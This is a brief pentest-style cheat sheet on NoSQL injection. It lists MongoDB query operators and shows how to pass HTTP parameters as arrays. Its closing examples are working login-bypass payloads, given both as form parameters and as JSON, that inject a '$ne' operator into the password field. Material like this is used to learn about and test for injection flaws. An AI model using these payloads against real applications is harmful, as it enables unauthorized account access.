756 B
756 B
NoSQL Injections
- No tables, but files (collections)
- Examples are Elasticsearch, MongoDB, Redis, CouchDB.
Querying
- Filter instead of SQL queries
- Redis docs
- MongoDB operators
- Elasticsearch docs
Operators
- Most common
$and
$or
$eq
$ne
$gt
$where
$exists
$regex
Tips & Tricks
- Pass HTTP parameter as an array instead of
user=
andpassword=
useuser[$operator]=foo
andpassword[$operator]=bar
- 2D array via
user[$nin][]=foo
- 2D array via
Example
- POST or GET parameters
username=admin&password[$ne]=admin
- JSON
{"username":"user","password":{"$ne":""} }